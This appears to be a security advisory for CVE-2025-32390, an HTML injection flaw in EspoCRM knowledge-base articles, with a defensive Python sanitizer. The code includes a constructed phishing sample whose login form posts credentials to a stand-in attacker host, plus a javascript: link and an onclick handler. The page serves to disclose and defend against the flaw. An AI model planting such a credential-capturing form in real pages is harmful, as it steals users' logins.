HTML Injection Vulnerability in EspoCRM Knowledge Base Articles
CVE-2025-32390

7 HIGH

Key Information:

Vendor: Espocrm
Status: Vendor
CVE Published: 12 May 2025

What is CVE-2025-32390?

EspoCRM, an open-source CRM platform, is susceptible to an HTML injection vulnerability in its Knowledge Base (KB) articles. Prior to version 9.0.8, authenticated users with access to read KB articles can inject arbitrary HTML into an article. An attacker can use this to create an article that mimics a legitimate login page and captures, in plain text, the credentials of any user who fills it in. The permissive HTML editing rights granted to KB articles are what make this possible. In environments where EspoCRM runs alongside other applications, such an article can serve as a convincing phishing page, putting credentials for those other platforms at risk as well. The issue has been addressed in version 9.0.8.
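The mitigation this class of bug calls for is server-side sanitisation of article bodies against an element and attribute allowlist, so that a stored article can never render a working form, script or active link. The following is an added illustration written for this page, not EspoCRM's own code or its fix; the allowlist, the `sanitize_article` function and the sample article are all assumptions constructed here.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist for knowledge-base article bodies: formatting elements only. No form, input,
# button, script or iframe, so a stored article cannot render a working login page.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li", "h1", "h2",
                "h3", "h4", "pre", "code", "blockquote", "a", "img", "table", "tr", "td", "th"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}  # never on* handlers or style
VOID_TAGS = {"br", "img"}
DISCARD_CONTENT = {"script", "style", "iframe", "object", "textarea"}  # drop their text too

def _safe_url(value):
    v = (value or "").strip().lower()  # rejects javascript:, data: and protocol-relative URLs
    return v.startswith(("http://", "https://", "mailto:", "/")) and not v.startswith("//")

class ArticleSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DISCARD_CONTENT:
            self._skip += 1
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)  # worth logging: a stripped <form> or <input> is a signal
            return
        kept = "".join(f' {n}="{escape(v or "")}"' for n, v in attrs
                       if n in ALLOWED_ATTRS.get(tag, ()) and (n not in ("href", "src") or _safe_url(v)))
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DISCARD_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

def sanitize_article(raw_html):
    # Returns (clean_html, dropped_tags) for a user-submitted article body.
    s = ArticleSanitizer()
    s.feed(raw_html)
    s.close()
    return "".join(s.out), s.dropped

# Constructed sample: an article body shaped like a fake login page.
PHISHING_ARTICLE = ('<h2>Session expired</h2><form action="https://phish.example/c" method="post">'
                    '<p>Username <input name="u"></p><p>Password <input name="p" type="password"></p>'
                    '<button type="submit">Sign in</button></form><script>document.title="Login"</script>'
                    '<a href="javascript:alert(1)" onclick="steal()">help</a>')
```

Run on the sample, the form, both inputs, the button and the script are removed and the link loses its `javascript:` target, leaving only inert headings, paragraphs and text; the `dropped` list is the value to feed into audit logging.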

Affected Version(s)

espocrm < 9.0.8

CVSS V4

Score: 7
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: None
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: Unknown

Timeline

  • Vulnerability published
  • Vulnerability reserved
